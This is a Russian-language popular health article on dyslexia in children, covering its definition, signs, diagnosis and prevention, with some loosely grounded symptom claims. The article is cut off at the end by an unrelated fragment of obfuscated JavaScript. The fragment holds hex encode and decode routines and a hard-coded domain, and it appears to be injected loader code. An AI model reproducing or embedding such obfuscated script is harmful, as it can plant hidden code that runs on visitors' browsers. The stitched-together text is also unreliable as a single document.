Дислексия - избирательное и специфическое расстройство чтения, при котором общая способность к обучению сохраняется. Причиной развития этого заболевания является неврологические нарушения генетической природы.
При развитии этой болезни у человека возникают: проблемы при обучении чтению и, конечно же, письму; неадекватное восприятие написанной информации; дезорганизация и плохая ориентация в пространстве; нарушение координации; непонимание прочитанного материала; отсутствие внимания.
Данное заболевания имеет ряд характерных симптомов, по которым каждый родитель сможет распознать его у своего ребенка: быстрая утомляемость ребенка; симуляция чтения и выполнения домашней работы; часто трет глаза; держит близко к глазам книгу, либо косит, либо закрывает при чтении один глаз; при чтении книги поворачивает голову таким образом, что один глаз в чтении совсем не участвует.
Также характерным признаком дислексии является, то что: при чтении пропускает слова либо же совсем не замечает некоторые места в тексте; непосредственно при чтении либо же после жалуется на головную боль; с трудом идентифицирует, запоминает и воспроизводит геометрические фигуры; пишет слова, особенно в раннем возрасте, задом наперед; неудовлетворительно читает; плохой почерк, бывает, что слова словно наползают друг на друга.
Диагностировать это заболевание необходимо как можно раньше. Но к сожалению многие родители и не подозревают о наличии такого недуга у их ребенка и зачастую определяется когда малыш пойдет в садик или в школу, когда начинает изучать буквы. С таким заболеванием детки могут не нагнать своих сверстников.
При диагностировании данного заболевания проводят тестирование на предмет определенных навыков развития речи, чтения, определяются когнитивные способности и проверяются органы слуха. Также деткам назначается психологическое обследование, при котором определяются функциональные особенности детей и наиболее для них приемлемые формы дальнейшего обучения.
Определяется уровень понимания при чтении текста, также его анализ, осознание читаемой и слушаемой речи.
К основным профилактическим мерам дислексии следует отнести постоянное общение с ребенком. То есть малыш должен все время находится в в речевой насыщенной среде, с ним в обязательном порядке полноценно общаться. При этом важно, что ребенок не выражал свои мысли и желания посредством жестов и коротких предложений, необходимо научить его выражаться полноценными предложениями.
К сожалению данное заболевание будет сопровождать малыша всю жизнь. Но у большинства детей все же развиваются постепенно функциональные навыки чтения. Лечение заболевания направлено на коррекцию всего учебного процесса. Сюда входит прямое и непрямое обучение распознаванию слов и определенным навыкам выделения компонентов слов.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "7mednews.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e